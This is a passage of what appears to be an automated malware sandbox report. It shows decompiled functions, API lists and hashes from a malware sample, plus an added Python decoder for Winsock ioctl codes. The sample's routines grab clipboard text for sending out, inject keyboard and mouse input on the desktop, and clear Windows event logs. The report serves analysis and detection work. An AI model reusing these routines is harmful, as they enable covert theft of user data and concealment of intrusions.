                                                                                    															_v148 = _t144 ^ _t293;
                                                                                    															_push(_t213);
                                                                                    															_push(_t279);
                                                                                    															_v152 = _v136;
                                                                                    															_push(_t268);
                                                                                    															_t269 = _t225;
                                                                                    															_v156 = _v128;
                                                                                    															_v168 = _v124;
                                                                                    															_v164 = _t269;
                                                                                    															_v160 = 0;
                                                                                    															__eflags = E04ECC4C0(_t269 + 0xb0,  &_v160);
                                                                                    															if(__eflags != 0) {
                                                                                    																_t214 = _v28;
                                                                                    															} else {
                                                                                    																_t285 =  *((intOrPtr*)(_t269 + 0xa4));
                                                                                    																_t214 = HeapAlloc( *(_t269 + 0x94), 0, _t285 + 0x38);
                                                                                    																_v28 = _t214;
                                                                                    																_t68 = _t214 + 0x38; // 0x38
                                                                                    																 *(_t214 + 0x14) = _t269 + 0x94;
                                                                                    																 *((intOrPtr*)(_t214 + 0x24)) = _t285;
                                                                                    																 *((intOrPtr*)(_t214 + 0x20)) = _t68;
                                                                                    															}
                                                                                    															_push(_v24);
                                                                                    															asm("xorps xmm0, xmm0");
                                                                                    															_push(_v20);
                                                                                    															asm("movups [ebx], xmm0");
                                                                                    															 *(_t214 + 0x10) = 0;
                                                                                    															 *(_t214 + 0x1c) = 0;
                                                                                    															 *(_t214 + 0x1c) =  *(_t269 + 0x18);
                                                                                    															_t270 = E04ED2430(_t269, __eflags);
                                                                                    															_t79 = _t270 + 0x54; // 0x54
                                                                                    															_t281 = _t79;
                                                                                    															EnterCriticalSection(_t281);
                                                                                    															_push(_a12);
                                                                                    															_t228 = _v32;
                                                                                    															E04ED2650(_t228, _t281, _v20, _t270, _v36, _t269);
                                                                                    															_t154 = _v32;
                                                                                    															__eflags =  *(_t154 + 0x4c);
                                                                                    															if( *(_t154 + 0x4c) == 0) {
                                                                                    																_t228 = _v36;
                                                                                    																__eflags =  *_t228 - 2;
                                                                                    																_t156 =  !=  ? 0x1c : 0x10;
                                                                                    																__imp__#4( *(_t270 + 0x88), _t228, 0x10);
                                                                                    																__eflags = 0x10 - 0xffffffff;
                                                                                    																if(0x10 == 0xffffffff) {
                                                                                    																	__imp__#111();
                                                                                    																	goto L63;
                                                                                    																} else {
                                                                                    																	_t163 =  &_v20;
                                                                                    																	_v20 = 1;
                                                                                    																	__imp__#10( *(_t270 + 0x88), 0x8004667e, _t163);
                                                                                    																	__eflags = _t163;
                                                                                    																	if(_t163 != 0) {
                                                                                    																		goto L70;
                                                                                    																	} else {
                                                                                    																		_t174 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t163);
                                                                                    																		__eflags = _t174;
                                                                                    																		if(_t174 == 0) {
                                                                                    																			goto L55;
                                                                                    																		} else {
                                                                                    																			 *(_t270 + 0x48) = 1;
                                                                                    																			_t175 = E04ED1D30(_v32, _t270);
                                                                                    																			__eflags = _t175 - 2;
                                                                                    																			if(_t175 == 2) {
                                                                                    																				_t176 = GetLastError();
                                                                                    																				__eflags = _t176;
                                                                                    																				_t156 =  ==  ? 0x4c7 : _t176;
                                                                                    																				goto L63;
                                                                                    																			} else {
                                                                                    																				_t156 = E04ED3700(_t214, _v32, _t270, _t281, _t270, _t214);
                                                                                    																				_t229 = 0;
                                                                                    																			}
                                                                                    																		}
                                                                                    																		goto L64;
                                                                                    																	}
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t177 =  &_v24;
                                                                                    																_v24 = 1;
                                                                                    																__imp__#10( *(_t270 + 0x88), 0x8004667e, _t177);
                                                                                    																__eflags = _t177;
                                                                                    																if(_t177 != 0) {
                                                                                    																	_push(0x80004005);
                                                                                    																	E04EB7AB0();
                                                                                    																	L70:
                                                                                    																	E04EB7AB0();
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	asm("int3");
                                                                                    																	_t294 = _t297;
                                                                                    																	_t165 =  *0x4f03008; // 0x3d21fb31
                                                                                    																	_v208 = _t165 ^ _t294;
                                                                                    																	_t257 = _v184;
                                                                                    																	__eflags = _t257;
                                                                                    																	_t283 = _v192;
                                                                                    																	_v216 = _v188;
                                                                                    																	_t169 =  ==  ? _t283 : _t283 + _t257;
                                                                                    																	_v212 =  ==  ? _t283 : _t283 + _t257;
                                                                                    																	 *((intOrPtr*)( *_t228 + 8))( &_v216, 1, _t281, _t293, 0x80004005);
                                                                                    																	__eflags = _v208 ^ _t294;
                                                                                    																	return E04ED572E(_v208 ^ _t294, _v196);
                                                                                    																} else {
                                                                                    																	_t180 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t177);
                                                                                    																	__eflags = _t180;
                                                                                    																	if(_t180 == 0) {
                                                                                    																		L55:
                                                                                    																		_t156 = GetLastError();
                                                                                    																	} else {
                                                                                    																		_t156 = E04ECD1A0( *((intOrPtr*)(_v32 + 0x40)),  *(_t270 + 0x88), _v36, _t214);
                                                                                    																	}
                                                                                    																	L63:
                                                                                    																	_t229 = 1;
                                                                                    																	L64:
                                                                                    																	_v28 = _t156;
                                                                                    																	__eflags = _t156;
                                                                                    																	if(_t156 != 0) {
                                                                                    																		__eflags = _t229;
                                                                                    																		if(_t229 != 0) {
                                                                                    																			E04ED2560(_v32, _t270, 0, 0, 0);
                                                                                    																			_t160 = E04ECC570(_v32 + 0xb0, _t214);
                                                                                    																			__eflags = _t160;
                                                                                    																			if(_t160 == 0) {
                                                                                    																				HeapFree( *( *(_t214 + 0x14)), _t160, _t214);
                                                                                    																			}
                                                                                    																		}
                                                                                    																	}
                                                                                    																	LeaveCriticalSection(_t281);
                                                                                    																	__eflags = _v16 ^ _t293;
                                                                                    																	return E04ED572E(_v16 ^ _t293);
                                                                                    																}
                                                                                    															}
                                                                                    														} else {
                                                                                    															_t185 = _t213 - 1;
                                                                                    															_t261 = _t185 %  *_t279;
                                                                                    															_t225 =  *( *((intOrPtr*)(_t279 + 0x44)) + _t261) & 0x000000ff;
                                                                                    															__eflags = _t185 /  *_t279 - _t225;
                                                                                    															if(_t185 /  *_t279 != _t225) {
                                                                                    																goto L47;
                                                                                    															} else {
                                                                                    																__eflags =  *((intOrPtr*)(_t268 + _t261 * 4)) - 1;
                                                                                    																if( *((intOrPtr*)(_t268 + _t261 * 4)) != 1) {
                                                                                    																	goto L47;
                                                                                    																} else {
                                                                                    																	_t296 = _t296 - 8;
                                                                                    																	_t225 = _t279;
                                                                                    																	_t187 = E04ED4DE0(_t213, _t225, _t268, _t279, _t213, 0);
                                                                                    																	__eflags = _t187;
                                                                                    																	if(_t187 == 0) {
                                                                                    																		goto L47;
                                                                                    																	} else {
                                                                                    																		_t188 = GetLastError();
                                                                                    																		__eflags = _t188;
                                                                                    																		_t189 =  ==  ? 0x4c7 : _t188;
                                                                                    																		return  ==  ? 0x4c7 : _t188;
                                                                                    																	}
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												} else {
                                                                                    													return 0x4d6;
                                                                                    												}
                                                                                    											} else {
                                                                                    												goto L23;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									__imp__#111();
                                                                                    									L33:
                                                                                    									_t210 = _t131;
                                                                                    									L34:
                                                                                    									goto L35;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						__eflags =  *_t209;
                                                                                    						if( *_t209 == 0) {
                                                                                    							goto L9;
                                                                                    						} else {
                                                                                    							E04EF1730();
                                                                                    							_t278 = _t296;
                                                                                    							 *_t278 = E04ECCC60(_t209, _t278);
                                                                                    							_t206 = E04ECCD10(_t209, 0, _t265, _t278, _t278);
                                                                                    							_t296 = _t296 + 4;
                                                                                    							__eflags = _t206;
                                                                                    							if(_t206 != 0) {
                                                                                    								goto L9;
                                                                                    							} else {
                                                                                    								__imp__#111();
                                                                                    								goto L35;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					L35:
                                                                                    					return E04ED572E(_v8 ^ _t291);
                                                                                    				}
                                                                                    			}
                                                                                    0x04ed3aa2
                                                                                    0x04ed3aa5
                                                                                    0x04ed3aa7
                                                                                    0x04ed3aaa
                                                                                    0x04ed3acd
                                                                                    0x04ed3ad3
                                                                                    0x04ed3ad5
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ad7
                                                                                    0x04ed3ad7
                                                                                    0x04ed3ada
                                                                                    0x00000000
                                                                                    0x04ed3adc
                                                                                    0x04ed3adc
                                                                                    0x04ed3adc
                                                                                    0x04ed3ada
                                                                                    0x04ed3ae9
                                                                                    0x04ed3af2
                                                                                    0x04ed3aff
                                                                                    0x04ed3b02
                                                                                    0x04ed3b0c
                                                                                    0x04ed3b12
                                                                                    0x04ed3b15
                                                                                    0x04ed3b2d
                                                                                    0x04ed3b33
                                                                                    0x04ed3b38
                                                                                    0x04ed3b3d
                                                                                    0x04ed3b40
                                                                                    0x00000000
                                                                                    0x04ed3b46
                                                                                    0x04ed3b46
                                                                                    0x04ed3b49
                                                                                    0x04ed3b4c
                                                                                    0x04ed3b79
                                                                                    0x04ed3b7c
                                                                                    0x04ed3b7e
                                                                                    0x04ed3b8c
                                                                                    0x04ed3b8c
                                                                                    0x04ed3b8f
                                                                                    0x04ed3b92
                                                                                    0x04ed3b92
                                                                                    0x04ed3b96
                                                                                    0x04ed3b9a
                                                                                    0x04ed3b9d
                                                                                    0x04ed3ba2
                                                                                    0x04ed3ba7
                                                                                    0x04ed3bad
                                                                                    0x04ed3bb7
                                                                                    0x04ed3bc0
                                                                                    0x04ed3bc3
                                                                                    0x04ed3bc7
                                                                                    0x04ed3b4e
                                                                                    0x04ed3b4e
                                                                                    0x04ed3b51
                                                                                    0x04ed3b53
                                                                                    0x04ed3b61
                                                                                    0x04ed3b61
                                                                                    0x04ed3b64
                                                                                    0x04ed3b72
                                                                                    0x04ed3b75
                                                                                    0x04ed3b76
                                                                                    0x04ed3b76
                                                                                    0x04ed3bc8
                                                                                    0x04ed3bcd
                                                                                    0x04ed3bd3
                                                                                    0x04ed3bd6
                                                                                    0x04ed3bdd
                                                                                    0x00000000
                                                                                    0x04ed3bdd
                                                                                    0x00000000
                                                                                    0x04ed3bd6
                                                                                    0x04ed3b17
                                                                                    0x04ed3b17
                                                                                    0x04ed3b1d
                                                                                    0x04ed3b22
                                                                                    0x00000000
                                                                                    0x04ed3b24
                                                                                    0x04ed3b24
                                                                                    0x04ed3b27
                                                                                    0x04ed3bf9
                                                                                    0x04ed3bfe
                                                                                    0x04ed3c03
                                                                                    0x04ed3c03
                                                                                    0x04ed3c08
                                                                                    0x04ed3c0d
                                                                                    0x04ed3c0e
                                                                                    0x04ed3c0f
                                                                                    0x04ed3c10
                                                                                    0x04ed3c11
                                                                                    0x04ed3c13
                                                                                    0x04ed3c14
                                                                                    0x04ed3c15
                                                                                    0x04ed3c17
                                                                                    0x04ed3c18
                                                                                    0x04ed3c1c
                                                                                    0x04ed3c25
                                                                                    0x04ed3c2a
                                                                                    0x04ed3c2c
                                                                                    0x04ed3c3c
                                                                                    0x04ed3c47
                                                                                    0x04ed3c4b
                                                                                    0x04ed3c51
                                                                                    0x04ed3c54
                                                                                    0x04ed3ca1
                                                                                    0x04ed3ca5
                                                                                    0x04ed3c56
                                                                                    0x04ed3c56
                                                                                    0x04ed3c58
                                                                                    0x04ed3c5b
                                                                                    0x04ed3c5d
                                                                                    0x04ed3ca8
                                                                                    0x04ed3ca8
                                                                                    0x04ed3cad
                                                                                    0x04ed3cb2
                                                                                    0x04ed3cb3
                                                                                    0x04ed3cb4
                                                                                    0x04ed3cb5
                                                                                    0x04ed3cb6
                                                                                    0x04ed3cb7
                                                                                    0x04ed3cb8
                                                                                    0x04ed3cb9
                                                                                    0x04ed3cba
                                                                                    0x04ed3cbb
                                                                                    0x04ed3cbc
                                                                                    0x04ed3cbd
                                                                                    0x04ed3cbe
                                                                                    0x04ed3cbf
                                                                                    0x04ed3cc0
                                                                                    0x04ed3cc1
                                                                                    0x04ed3cc3
                                                                                    0x04ed3cc6
                                                                                    0x04ed3ccd
                                                                                    0x04ed3cd3
                                                                                    0x04ed3cd4
                                                                                    0x04ed3cd5
                                                                                    0x04ed3cdb
                                                                                    0x04ed3cdc
                                                                                    0x04ed3cde
                                                                                    0x04ed3ce4
                                                                                    0x04ed3cf1
                                                                                    0x04ed3cf4
                                                                                    0x04ed3d00
                                                                                    0x04ed3d02
                                                                                    0x04ed3d35
                                                                                    0x04ed3d04
                                                                                    0x04ed3d04
                                                                                    0x04ed3d1c
                                                                                    0x04ed3d24
                                                                                    0x04ed3d27
                                                                                    0x04ed3d2a
                                                                                    0x04ed3d2d
                                                                                    0x04ed3d30
                                                                                    0x04ed3d30
                                                                                    0x04ed3d38
                                                                                    0x04ed3d3b
                                                                                    0x04ed3d40
                                                                                    0x04ed3d43
                                                                                    0x04ed3d46
                                                                                    0x04ed3d4d
                                                                                    0x04ed3d57
                                                                                    0x04ed3d5f
                                                                                    0x04ed3d61
                                                                                    0x04ed3d61
                                                                                    0x04ed3d65
                                                                                    0x04ed3d6b
                                                                                    0x04ed3d72
                                                                                    0x04ed3d79
                                                                                    0x04ed3d7e
                                                                                    0x04ed3d81
                                                                                    0x04ed3d85
                                                                                    0x04ed3deb
                                                                                    0x04ed3df8
                                                                                    0x04ed3dfc
                                                                                    0x04ed3e07
                                                                                    0x04ed3e0d
                                                                                    0x04ed3e10
                                                                                    0x04ed3e83
                                                                                    0x00000000
                                                                                    0x04ed3e12
                                                                                    0x04ed3e12
                                                                                    0x04ed3e15
                                                                                    0x04ed3e28
                                                                                    0x04ed3e2e
                                                                                    0x04ed3e30
                                                                                    0x00000000
                                                                                    0x04ed3e36
                                                                                    0x04ed3e44
                                                                                    0x04ed3e4a
                                                                                    0x04ed3e4c
                                                                                    0x00000000
                                                                                    0x04ed3e4e
                                                                                    0x04ed3e52
                                                                                    0x04ed3e59
                                                                                    0x04ed3e5e
                                                                                    0x04ed3e61
                                                                                    0x04ed3e71
                                                                                    0x04ed3e77
                                                                                    0x04ed3e7e
                                                                                    0x00000000
                                                                                    0x04ed3e63
                                                                                    0x04ed3e68
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e61
                                                                                    0x00000000
                                                                                    0x04ed3e4c
                                                                                    0x04ed3e30
                                                                                    0x04ed3d87
                                                                                    0x04ed3d87
                                                                                    0x04ed3d8a
                                                                                    0x04ed3d9d
                                                                                    0x04ed3da3
                                                                                    0x04ed3da5
                                                                                    0x04ed3ee4
                                                                                    0x04ed3ee9
                                                                                    0x04ed3eee
                                                                                    0x04ed3ef3
                                                                                    0x04ed3ef8
                                                                                    0x04ed3ef9
                                                                                    0x04ed3efa
                                                                                    0x04ed3efb
                                                                                    0x04ed3efc
                                                                                    0x04ed3efd
                                                                                    0x04ed3efe
                                                                                    0x04ed3eff
                                                                                    0x04ed3f01
                                                                                    0x04ed3f06
                                                                                    0x04ed3f0d
                                                                                    0x04ed3f10
                                                                                    0x04ed3f13
                                                                                    0x04ed3f19
                                                                                    0x04ed3f1c
                                                                                    0x04ed3f24
                                                                                    0x04ed3f2a
                                                                                    0x04ed3f33
                                                                                    0x04ed3f39
                                                                                    0x04ed3f44
                                                                                    0x04ed3dab
                                                                                    0x04ed3db9
                                                                                    0x04ed3dbf
                                                                                    0x04ed3dc1
                                                                                    0x04ed3de0
                                                                                    0x04ed3de0
                                                                                    0x04ed3dc3
                                                                                    0x04ed3dd3
                                                                                    0x04ed3dd8
                                                                                    0x04ed3e89
                                                                                    0x04ed3e89
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e91
                                                                                    0x04ed3e93
                                                                                    0x04ed3e95
                                                                                    0x04ed3e97
                                                                                    0x04ed3ea5
                                                                                    0x04ed3eb1
                                                                                    0x04ed3eb6
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec1
                                                                                    0x04ed3ec1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3e97
                                                                                    0x04ed3ec8
                                                                                    0x04ed3ed4
                                                                                    0x04ed3ee1
                                                                                    0x04ed3ee1
                                                                                    0x04ed3da5
                                                                                    0x04ed3c5f
                                                                                    0x04ed3c64
                                                                                    0x04ed3c67
                                                                                    0x04ed3c69
                                                                                    0x04ed3c6d
                                                                                    0x04ed3c6f
                                                                                    0x00000000
                                                                                    0x04ed3c71
                                                                                    0x04ed3c71
                                                                                    0x04ed3c75
                                                                                    0x00000000
                                                                                    0x04ed3c77
                                                                                    0x04ed3c77
                                                                                    0x04ed3c7a
                                                                                    0x04ed3c7f
                                                                                    0x04ed3c84
                                                                                    0x04ed3c86
                                                                                    0x00000000
                                                                                    0x04ed3c88
                                                                                    0x04ed3c88
                                                                                    0x04ed3c8f
                                                                                    0x04ed3c97
                                                                                    0x04ed3c9c
                                                                                    0x04ed3c9c

                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04ED3976,?,?,?,?,FFFFFFFF,?), ref: 04ED3A71
                                                                                    • socket.WS2_32(00000000,00000001,00000006), ref: 04ED3A9A
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED3AAC
                                                                                      • Part of subcall function 04ECCD10: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 04ECCD6F
                                                                                      • Part of subcall function 04ECCD10: htons.WS2_32 ref: 04ECCD7F
                                                                                    • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04ED3B0C
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED3B17
                                                                                    • bind.WS2_32(?,00000002,0000001C), ref: 04ED3BCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$AddressIoctlStringbindhtonssocket
                                                                                    • String ID:
                                                                                    • API String ID: 1590887309-0
                                                                                    • Opcode ID: a73037f6ae8a8b5e12cb58f2a6384d58a61d783d163d62f63dc9d71bebb3f042
                                                                                    • Instruction ID: 2a03ef1984f9c19b77e8963fa5895a82d024bc5a08627299ea6a5ca5bef2cc00
                                                                                    • Opcode Fuzzy Hash: a73037f6ae8a8b5e12cb58f2a6384d58a61d783d163d62f63dc9d71bebb3f042
                                                                                    • Instruction Fuzzy Hash: 54618474F00208ABEB24DF68D880BAE77B1EF84314F10612AFD55A7290E775BD42DB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
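The Winsock block above is easier to read once its raw arguments are decoded: socket(00000000,00000001,00000006) is socket(AF_UNSPEC, SOCK_STREAM, IPPROTO_TCP); bind(...,0000001C) passes a 28-byte name, the size of SOCKADDR_IN6; and WSAIoctl(...,98000004,?,0000000C,...) uses control code 0x98000004 with a 12-byte input buffer. The following decoder is an added example for reading such reports, not part of the sandbox output or of the analysed sample. The bit layout and the constants come from the Winsock 2 headers (ws2def.h, mstcpip.h); the table of named codes is intentionally limited to codes whose definitions are certain, and the keepalive struct layout is the 12-byte struct tcp_keepalive that SIO_KEEPALIVE_VALS expects.

```python
"""Decode the raw WSAIoctl control codes that sandbox reports print as hex.

Added example for reading this report; it is not part of the sandbox output
or of the analysed sample. Constants come from the Winsock 2 headers
(ws2def.h / mstcpip.h). The table of names is deliberately short and only
covers codes whose definition is certain.
"""
import struct

# Direction bits (top three bits of the 32-bit control code).
IOC_VOID = 0x20000000   # no parameters
IOC_OUT = 0x40000000    # copy out
IOC_IN = 0x80000000     # copy in
IOC_INOUT = IOC_IN | IOC_OUT

# Family bits 27-28.
IOC_UNIX = 0x00000000       # legacy BSD-style _IOW('f', n, type) codes
IOC_WS2 = 0x08000000
IOC_PROTOCOL = 0x10000000
IOC_VENDOR = 0x18000000

FAMILY_NAMES = {IOC_UNIX: "IOC_UNIX", IOC_WS2: "IOC_WS2",
                IOC_PROTOCOL: "IOC_PROTOCOL", IOC_VENDOR: "IOC_VENDOR"}
DIRECTION_NAMES = {IOC_VOID: "IOC_VOID", IOC_OUT: "IOC_OUT",
                   IOC_IN: "IOC_IN", IOC_INOUT: "IOC_INOUT"}


def wsaio(direction, family, number):
    """Equivalent of the _WSAIO / _WSAIOR / _WSAIOW / _WSAIORW header macros."""
    return direction | family | number


KNOWN_CODES = {
    wsaio(IOC_IN, IOC_VENDOR, 1): "SIO_RCVALL",
    wsaio(IOC_IN, IOC_VENDOR, 2): "SIO_RCVALL_MCAST",
    wsaio(IOC_IN, IOC_VENDOR, 3): "SIO_RCVALL_IGMPMCAST",
    wsaio(IOC_IN, IOC_VENDOR, 4): "SIO_KEEPALIVE_VALS",
    wsaio(IOC_IN, IOC_VENDOR, 12): "SIO_UDP_CONNRESET",
    wsaio(IOC_OUT, IOC_WS2, 22): "SIO_ADDRESS_LIST_QUERY",
    wsaio(IOC_INOUT, IOC_WS2, 6): "SIO_GET_EXTENSION_FUNCTION_POINTER",
    0x8004667E: "FIONBIO",   # _IOW('f', 126, u_long)
}


def decode_ioctl(code):
    """Split a Winsock control code into its fields and name it if known."""
    direction = code & 0xE0000000
    family = code & 0x18000000
    info = {
        "code": f"0x{code:08X}",
        "direction": DIRECTION_NAMES.get(direction, f"0x{direction:08X}"),
        "family": FAMILY_NAMES[family],
        "name": KNOWN_CODES.get(code, "unknown"),
    }
    if family == IOC_UNIX:
        # BSD layout: bits 16-22 = parameter size, bits 8-15 = group char, bits 0-7 = number
        info["param_size"] = (code >> 16) & 0x7F
        info["group"] = chr((code >> 8) & 0xFF)
        info["number"] = code & 0xFF
    else:
        # WS2 layout: everything below the family bits is the function number
        info["number"] = code & 0x07FFFFFF
    return info


# struct tcp_keepalive { u_long onoff; u_long keepalivetime; u_long keepaliveinterval; }
TCP_KEEPALIVE = struct.Struct("<III")


def pack_keepalive(onoff, time_ms, interval_ms):
    """Build the 12-byte input buffer SIO_KEEPALIVE_VALS takes."""
    return TCP_KEEPALIVE.pack(onoff, time_ms, interval_ms)


def parse_keepalive(buf):
    """Inverse of pack_keepalive; rejects buffers of the wrong size."""
    if len(buf) != TCP_KEEPALIVE.size:
        raise ValueError(f"expected {TCP_KEEPALIVE.size} bytes, got {len(buf)}")
    return TCP_KEEPALIVE.unpack(buf)


if __name__ == "__main__":
    # Arguments as printed in the report: dwIoControlCode 0x98000004, cbInBuffer 0x0000000C
    print(decode_ioctl(0x98000004))
    print("input buffer size matches tcp_keepalive:", TCP_KEEPALIVE.size == 0x0C)
```

Run against the report's values, the decoder resolves 0x98000004 to IOC_IN | IOC_VENDOR | 4, which is SIO_KEEPALIVE_VALS, and the 0x0C input length matches the size of struct tcp_keepalive. That identifies the call as enabling TCP keepalives on the freshly created socket rather than, for instance, SIO_RCVALL promiscuous capture, which would be 0x98000001.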

                                                                                    APIs
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • SetCursorPos.USER32(?,7697ADB0,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20E7
                                                                                    • WindowFromPoint.USER32(?,7697ADB0,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20EF
                                                                                    • SetCapture.USER32(00000000,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20F6
                                                                                    • keybd_event.USER32 ref: 04EC213B
                                                                                    • mouse_event.USER32 ref: 04EC21EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpimouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 3538182014-0
                                                                                    • Opcode ID: 4f0061bacc8e8e6264abf94bc24e6ef66a93f9c79be5c8aca09fe3cd9e0dd994
                                                                                    • Instruction ID: 7cbbc88184a7e9154a9e78c049c43aec932b3bf329c0fe245e612bf976b85797
                                                                                    • Opcode Fuzzy Hash: 4f0061bacc8e8e6264abf94bc24e6ef66a93f9c79be5c8aca09fe3cd9e0dd994
                                                                                    • Instruction Fuzzy Hash: 6E51E231BC0300BBF7318AA59D4BF557A59DB85F11F304286FB05BF2C5E6E4B9428668
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 47%
                                                                                    			// Clipboard grab: reads CF_UNICODETEXT (0xd) from the clipboard, prefixes it with
                                                                                    			// the marker byte 'y' (0x79) and hands the buffer to E04EB1C60 with command 0x3f.
                                                                                    			// E04ED5785, E04EDDC90 and E04ED573F are not resolved by the decompiler; from their
                                                                                    			// argument patterns they behave as allocate, memcpy and free respectively.
                                                                                    			E04EB7500(intOrPtr __ecx) {
                                                                                    				void* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t3;
                                                                                    				intOrPtr _t4;
                                                                                    				char* _t6;
                                                                                    				int _t9;
                                                                                    				void* _t13;
                                                                                    				void* _t21;
                                                                                    				intOrPtr _t23;
                                                                                    				void* _t25;
                                                                                    				void* _t29;
                                                                                    				void* _t31;
                                                                                    				char* _t32;
                                                                                    				void* _t40;
                                                                                    
                                                                                    				_t23 = __ecx;
                                                                                    				_v12 = __ecx;                                   // this pointer; _v12 + 4 is the sink object used below
                                                                                    				_t9 = OpenClipboard(0);                         // no owner window: clipboard opened by this process
                                                                                    				if(_t9 == 0) {
                                                                                    					return _t9;
                                                                                    				}
                                                                                    				if(IsClipboardFormatAvailable(0xd) != 0) {      // 0xd == CF_UNICODETEXT
                                                                                    					_t21 = GetClipboardData(0xd);
                                                                                    					if(_t21 != 0) {
                                                                                    						_t13 = GlobalLock(_t21);                    // pointer to the clipboard text
                                                                                    						_v8 = _t13;
                                                                                    						_t40 = _t13;
                                                                                    						if(_t13 != 0) {
                                                                                    							_push(_t31);
                                                                                    							_t3 = GlobalSize(_t21) + 1;             // one extra byte for the 'y' prefix
                                                                                    							_t29 = _t3;
                                                                                    							_push(_t29);
                                                                                    							_t32 = E04ED5785(_t23, _t31, _t40);     // allocate _t29 bytes
                                                                                    							_t4 = _t29 - 1;                         // == GlobalSize(_t21)
                                                                                    							_t6 = _t32 + 1;
                                                                                    							_t25 = _t6;                             // payload starts after the marker
                                                                                    							 *_t32 = 0x79;                          // 'y' marker byte
                                                                                    							E04EDDC90(_t25, _v8, _t4);              // copy clipboard contents after the marker
                                                                                    							GlobalUnlock(_t21);
                                                                                    							_push(_t25);
                                                                                    							_push(0x3f);
                                                                                    							_push(_t29);
                                                                                    							_push(_t32);
                                                                                    							E04EB1C60( *((intOrPtr*)(_v12 + 4)));   // hand off (buffer, length, command 0x3f, payload)
                                                                                    							E04ED573F(_t32);                        // release the buffer
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return CloseClipboard();
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenClipboard.USER32(00000000), ref: 04EB750B
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 04EB7517
                                                                                    • GetClipboardData.USER32 ref: 04EB7524
                                                                                    • GlobalLock.KERNEL32 ref: 04EB7531
                                                                                    • GlobalSize.KERNEL32(00000000), ref: 04EB7541
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 04EB7569
                                                                                    • CloseClipboard.USER32 ref: 04EB758B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AvailableCloseDataFormatLockOpenSizeUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2900998456-0
                                                                                    • Opcode ID: b0e7fc15170cb3a64d7e56c5567fa747b87e4452ecd8aa34e098ed73894d5ed6
                                                                                    • Instruction ID: 28430f74df74a1cd26ca3b118ee6e37bf8e1b58230eb2c17a4780b7e7a7656ed
                                                                                    • Opcode Fuzzy Hash: b0e7fc15170cb3a64d7e56c5567fa747b87e4452ecd8aa34e098ed73894d5ed6
                                                                                    • Instruction Fuzzy Hash: 6511E935A00306BBE7116FB19C48E5B7B7CDF84306F001269F94696141EE39E905C7A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenEventLogA.ADVAPI32(00000000,04EFD100), ref: 04EBA046
                                                                                    • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 04EBA055
